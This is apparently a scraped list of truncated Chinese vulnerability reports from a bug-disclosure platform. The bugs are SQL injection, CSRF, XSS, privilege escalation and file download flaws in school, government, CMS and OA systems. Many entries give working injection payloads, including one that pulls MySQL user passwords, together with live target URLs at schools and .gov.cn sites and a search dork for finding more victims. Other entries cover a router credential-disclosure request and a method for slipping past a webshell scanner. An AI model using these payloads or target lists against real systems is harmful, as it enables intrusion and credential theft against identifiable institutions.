安脉学生综合管理系统5处SQL注入漏洞#4

简要描述： 安脉学生综合管理系统5处SQL注入漏洞4 详细说明： 5处利用payload分别如下 /Asset/House/HouseInfoView.aspx?HouseID=1' and @@version=1-- /Asset/House/HouseMaintainview.aspx?HouseID=1' and @@version=1-- /Asset/House/HouseRebuildview.aspx?HouseID=1' and @@version=1-- /Asset/House/Newhexiao.aspx?hidsearch=search&housebelong=1...

某政务系统一处通用SQL注入漏洞（附众多政务案例）

简要描述： 某政务系统一处通用SQL注入漏洞（附众多政务案例） 详细说明： 系统开发厂商：邯郸市连邦软件发展有限公司 系统架构：ASPX+MSSQL 漏洞文件：workplate/xzsp/tjfx/grbjtj/list.aspx sxmc参数过滤存在问题，导致注入 关键字：inurl：workplate 部分政府案例： 日照市网上审批系统 http://www.rzfwzx.gov.cn/workplate/xzsp/tjfx/grbjtj/list.aspx 保定市网上审批系统...

Mao10CMS V3.3.0 3处sql注入打包

简要描述： rt。 详细说明： 1 看到这个漏洞http://wooyun.org/bugs/wooyun-2010-090196 看看官方怎么修补的 /Application/User/Controller/RegisterController.class.php $username = mcmagicinmcremovehtml$POST'username','all'; 有了过滤。看到 mcuserid function mcuserid $username = cookie'username'; $pageid = M'meta'-where"metakey='username'...

某教学系统存在注入漏洞

简要描述： RT 详细说明： SQL注入链接： /anmai/time/jiaoshirenke/teasubject.aspx 案例： http://218.78.241.80/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://jmzx.xmedu.cn:9999/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1...

A teaching system of the present injection vulnerability

Brief description: RT Detailed description: SQL injection file: /anmai/SFManage/lookbookpreeshow. aspx Case: http://218.78.241.80/anmai/SFManage/lookbookpreeshow.aspx?year1=1 http://jmzx.xmedu.cn:9999/anmai/SFManage/lookbookpreeshow.aspx?year1=1...

安脉学生综合管理系统5处SQL注入漏洞#3

简要描述： 安脉学生综合管理系统5处SQL注入漏洞3 详细说明： 5处利用payload分别如下 /Asset/Device/DeviceValidate.aspx?PrepareNo=1' and @@version=1-- /Asset/Field/fieldInfoView.aspx?fieldenrolid=1'and @@version=1-- /Asset/House/AddHouseSort.aspx?radiobutton=1&Action=Edit&HousetypeID=1 and @@version=1...

mcms最新版SQL注入4枚

简要描述： mcms最新版SQL注入4枚 详细说明： 在wooyun上看到掌易科技终于不再忽略漏洞了，我也来凑凑热闹吧。去下了mcms的最新版（v3.1.0.enterprise），来研究研究。 注入一枚：POST /app/public/model.php?tpl=data&modelname=adv&stype=1&skey=title&sval=test&p=1（注意public文件夹是安装系统时取的名字）post中有多个参数，都存在过滤不严的问题。 当tpl为attr时，modelname存在注入，当...

ESPCMS后台CSRF修改管理密码

简要描述： ESPCMS后台CSRF修改管理密码 详细说明： 修改管理员密码没有验证原密码 我也是醉了 抓包 没有token值验证 构造表单试试？ ok啊 可以修改啊 表单构造好了，但是修改好了之后随便不会提示修改了密码，但是会自动跳转到后台，这样就会被管理员发现或者产生怀疑了 肿么破？？？ 我们利用回旋镖 我们新建一个html，代码如下 乌云测试 !--设...

某教学系统存在注入漏洞

简要描述： RT 详细说明： SQL注入文件： /anmai/teacher/zonghe/singleSearch.aspx 案例： http://218.78.241.80/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://jmzx.xmedu.cn:9999/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.gxbyzx.cn:88/anmai/teacher/zonghe/singleSearch.aspx?action1=1...

某教学系统存在注入漏洞

简要描述： RT 详细说明： SQL注入文件： /anmai/SFManage/tfallremove.aspx 案例： http://218.78.241.80/anmai/SFManage/tfallremove.aspx?tfid=1 http://jmzx.xmedu.cn:9999/anmai/SFManage/tfallremove.aspx?tfid=1 http://www.gxbyzx.cn:88/anmai/SFManage/tfallremove.aspx?tfid=1...

Berta CMS 0.8.10b engine/upload.php 文件上传漏洞

No description provided by source...

dyp2p v3.0 index.php SQL注入漏洞

No description provided by source...

安脉学生综合管理系统5处SQL注入漏洞

简要描述： 安脉学生综合管理系统5处SQL注入漏洞 详细说明： 5处利用payload分别如下 /OA/document/DocCheckView.aspx?id=1 and @@version=1 /OA/news/viewAffiche.aspx?id=1 and @@version=1 /Asset/Device/AdminPhoto.aspx?Action=Modify&HouseID=1' and @@version=1-- /Asset/Device/DeviceCancelInfoView.aspx?DeviceCancelID=1' and @@version=1--...

ROCBOSS 1.1 /module/user.module.class.php SQL注入漏洞

漏洞文件： \module\user.module.class.php 第11行代码： $userInfo=Common::getMemberInfo$this-db,isnumeric$userId ? 'uid' : 'nickname', $userId; 这一行代码进行了数据库查询，关键之处在$userId这个变量上 向上回溯到第10行代码： $userId=isset$GET'id' && trim$GET'id' != '' ? $GET'id' : $this-loginInfo'uid'; 当$GET‘id’被赋值的时候这个参数就能控制了，而且没有进行过滤。...

UWA 2.1.5 /core/lib/ext/AFilter.class.php 跨站脚本漏洞

No description provided by source...

PHPCMS V9 /phpcms/modules/vote/index.php 代码执行漏洞

漏洞影响版本：phpcms v9.5.8漏洞分析：hpsso/index.php文件所有的操作都存在严重的注入问题，这个类文件的构造函数最先调用它的父构造函数，通过authkey来解析POST传入的data内容，解析后data中的内容会作为注册、登陆、删除用户等操作的内容依据，而这些操作都会将这些数据作为数据库查询语句使用。这个问题其实在XXX的《PHPCMS V9...

UWA 2.2.1 /lib/ctrlr/Member/MemberCtrlr.class.php SQL注入漏洞

No description provided by source. 由于此漏洞需要验证码 不太好自动化 获取数据库名 membermodelid=1&memberid0=exp&memberid1=111,122,select database,1,1,1,1,1,1,1,1,1,1,1%23 获取表前缀 membermodelid=1&memberid0=exp&memberid1=111,122,select tablename from informationschema.tables where tableschema= 0xxxxxx limit...

UWA 2.1.5 /core/tpl/page_trace.php 信息泄漏漏洞

No description provided by source...

大汉政府信息公开多处SQL注入二(附100个案例)

简要描述： 大汉政府信息公开多处SQL注入二附100个案例 详细说明： 依然webservice漏洞 /xxgk/services/WSYsqgk?wsdl 该WSYsqgk服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如 wsTest getClientIpAxis wsGetYsqgk 上述方法的多个参数均存在漏洞，这里随便选取一个方法进行测试 首先保存如下内容为wooyun.txt POST /xxgk/services/WSYsqgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type:...

UWA 2.1.5 /core/lib/core/App.class.php 信息泄漏漏洞

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '1768' vul ID version = '1' author = '王畅' vulDate = '2014-12-16' createDate =...

PHPCMS V9 /phpsso_server/phpcms/modules/phpsso/index.php SQL注入漏洞

/api/getmenu.phpfunction ajaxgetlist $cachefile = $GET'cachefile'; $cachefile = strreplacearray'/', '//', '', $cachefile; //$cachefile = pregreplace'/\x00-\x08\x0B\x0C\x0E-\x1F\x7F+/S', '', $cachefile; $path = $GET'path'; $path = strreplacearray'/', '//', '', $path; //$path =...

Netentsec ASG /WebPages/applyhardware.php SQL注入漏洞

No description provided by source...

某教学系统存在注入漏洞

简要描述： RT 详细说明： SQL注入文件： /anmai/refresher/Ajax/DelFuJian.aspx SQL注入案例： http://218.78.241.80/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://jmzx.xmedu.cn:9999/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1...

某教学系统存在注入漏洞

简要描述： RT 详细说明： SQL注入文件： /anmai/RecruitstuManage/hiddenValue.aspx SQL注入案例： http://218.78.241.80/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://jmzx.xmedu.cn:9999/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.gxbyzx.cn:88/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1...

某CMS存在越权漏洞(任意用户信息修改)

简要描述： 某CMS存在越权漏洞任意用户信息修改 详细说明： 账号A uid=726 账号B uid=727 越权修改账号A uid=726 的信息 成功修改 ok http://demo2.74cms.com/ demo演示站点2也存在说明存在漏洞了 漏洞证明： 账号A uid=726 账号B uid=727 img src="https://images.seebug.org/upload/201504/0722363756a38e431bcb1a1da23429...

某教学系统存在注入漏洞

简要描述： RT 详细说明： SQL注入文件： /anmai/SFManage/tfdeleN.aspx 案例： http://218.78.241.80/anmai/SFManage/tfdeleN.aspx?tfid=1 http://jmzx.xmedu.cn:9999/anmai/SFManage/tfdeleN.aspx?tfid=1 http://www.gxbyzx.cn:88/anmai/SFManage/tfdeleN.aspx?tfid=1 http://oa.w12z.com/anmai/SFManage/tfdeleN.aspx?tfid=1...

Mao10CMS V3.3.0 两处sql注入（官网demo测试）

简要描述： V3.3.0 两处sql注入。 详细说明： 发现mao10 用的是老版本的tp框架，于是乎注入就来了。。 1 /Application/User/Controller/IndexController.class.php public function edit$id=false if!isnumeric$id $id = mcuserid; ; ifisnumeric$id ifmcuserid==$id ifmcremovehtml$POST'title','all' $title =...

TinyShop SQL注入

简要描述： 1.4 详细说明： 1.4更新内容中 4、增加是否开启邮箱注册验证功能（防止垃圾用户注册），同时加入token防止一些自动注册软件的注册。 看了一下 /protected/controllers/simple.php中 //账户激活邮件认证 public function activationuser $code =Filter::textReq::args'code'; //获取code参数 $emailcode = substr$code,32; $validcode = substr$code,0,32; $email = Crypt::decode$emailcode...

云锁Webshell扫杀、拦截Bypass

简要描述： 云锁的一个缺陷 详细说明： 云锁的Webshell查杀和拦截功能对包含一些特殊字符具体哪些字符可自测，仅拿一个作为例子作为文件名的文件失效。 两个一样的一句话，分别使用shell.asp和♥shell.asp作为文件名。 做查杀和访问对比如图： 巡检只检出了shell.asp，没有检出♥shell.asp。 可以看到，访问拦截只针对普通文件名有效。 漏洞证明： 一只普通大马：...

EduSoho 最新版两处泄露accessKey和secretKey

简要描述： 可在官网重新绑定，发送云短信，下载安装应用。 详细说明： 出现问题的地方在安装文件/start-install.php false, ; $twig-addGlobal'edushoversion', \Topxia\System::VERSION; $step =intvalempty$GET'step' ? 0 : $GET'step'; $functionName = 'installstep' . $step; $functionName; use Topxia\Service\Common\ServiceKernel; use...

LionWiki /index.php 任意文件下载漏洞

No description provided by source...

TWiki 4.2.0 /bin/configure 任意文件下载漏洞

No description provided by source...

Mao10CMS 3.0.2 /Application/Article/Controller/IndexController.class.php SQL注入漏洞

No description provided by source...

KC-Wiki 1.0 /simplest/wiki.php 任意文件下载漏洞

No description provided by source...

WikiWebHelp 0.28 /handlers/getpage.php SQL 注入漏洞

No description provided by source...

phpmps 存储XSS漏洞

简要描述： phpmps 存储XSS漏洞 详细说明： 首先提交一个请求，在orderid处填写payload 之后后台访问，支付记录，触发XSS。 漏洞证明：...

Mao10CMS 3.0.2 /Application/user/Controller/RegisterController.class.php SQL注入漏洞

No description provided by source...

Dokuwiki 20090214 /doku.php 任意文件下载漏洞

No description provided by source...

mcms最新版SQL注入8枚打包（可出任意数据）

简要描述： mcms最新版SQL注入8枚打包（可出任意数据） 详细说明： 前段时间在wooyun提交了几个mcms的漏洞，以前mcms的版本是v3.1.1.enterprise， WooYun: mcms最新版SQL注入三枚打包（可出任意数据） ，现在都升级到v3.1.3.enterprise了，还是来研究一下mcmsv3.1.3.enterprise吧。 注入一枚：POST...

phpems 多处sql注射

简要描述： phpems 多处sql注射 详细说明： 百度搜索： title:PHPEMS无纸化模拟考试系统 ev.cls.php: public function getClientIp if!isset$this-e'ip' if getenv"HTTPCLIENTIP" && strcasecmpgetenv"HTTPCLIENTIP", "unknown" $ip = getenv"HTTPCLIENTIP"; else if getenv"HTTPXFORWARDEDFOR" && strcasecmpgetenv"HTTPXFORWARDEDFOR", "unknown" $...

大米CMS最新版一个参数引发多处sql注入， 绕过防御(附验证脚本)

简要描述： 过滤不严 详细说明： 出现注入的地方是在ApiAction.class.php文件ajaxarclist函数 function ajaxarclist $prefix = !empty$REQUEST'prefix'?bool$REQUEST'prefix':true; //表过滤防止泄露信息,只允许的表 if!inarray$REQUEST'model',array'article','type','ad','label','link'exit; if!empty$REQUEST'model' if$prefix == true $model =...

某教学教育系统存在注入漏洞

简要描述： RT 详细说明： SQL注入文件： /anmai\KYMamage\PlanTask\TaskOutlayEarningRight.aspx SQL注入案例： http://218.78.241.80/anmai\KYMamage\PlanTask\TaskOutlayEarningRight.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai\KYMamage\PlanTask\TaskOutlayEarningRight.aspx?depname=a...

某网店系统存在越权漏洞(任意用户信息修改)

简要描述： 某网店系统存在越权漏洞任意用户信息修改 详细说明： 账号 A id=375 账号 B id=376 越权修改账号a的信息 成功修改 demo演示站点呢 一样可以修改收货地址 账号A id=362 账号B id=363 img src="https://images.seebug.org/upload/201504/07000058fd624e353d682fc05a6b2efead0a6338.jpg" alt="2.jpg" width="600" onerror=...

通达oa2013集团版注入

简要描述： 通达 详细说明： 官网demo登录: http://www.day900.com/ cw 登陆有点鸡肋 注入点+payload: http://www.day900.com/general/budget/budgetprocess/budgetyeardepts.php?DEPTID=1&DEPTIDPRIV=0&DEPTIDS=1 and select 1 from select count,concatselect concathost,user,password from mysql.user limit 0,1,floorrand02x from...

KesionCMS存在越权操作(demo演示)

简要描述： 某在线考试系统存在越权操作demo演示 详细说明： 测试账号A snake 密码 123123 测试账号B heise 密码123123 账号A uid 975 账号B uid 976 增加975的收货地址 漏洞证明： 测试账号A snake 密码 123123 测试账号B heise 密码123123 账号A uid 975 账号B uid 976 https://imag...

DedeCms 5.6 /plus/carbuyaction.php 本地文件包含漏洞

No description provided by source...

Piwigo 2.6.0 /picture.php SQL注入漏洞

/include/functionsrate.inc.php if !isset$rate or !$conf'rate' or !inarray$rate, $conf'rateitems' return false; …….. pwgquery$query; $query = ' INSERT INTO '.RATETABLE.' userid,anonymousid,elementid,rate,date VALUES ' .$user'id'.',' .'''.$anonymousid.'',' .$imageid.',' .$rate .',NOW ;';...

KC-Wiki 1.0 /minimal/wiki.php 任意文件下载漏洞

No description provided by source...

svn 信息泄漏漏洞

No description provided by source...

Ruijie Router NBR 信息泄漏漏洞

使用ModifyHeaders修改Cookie头为：auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;使用Hackbar发送POST包到：http://localhost/WEBVMS/LEVEL15/内容为：command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. 得到admin的帐号密码。 !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req fr...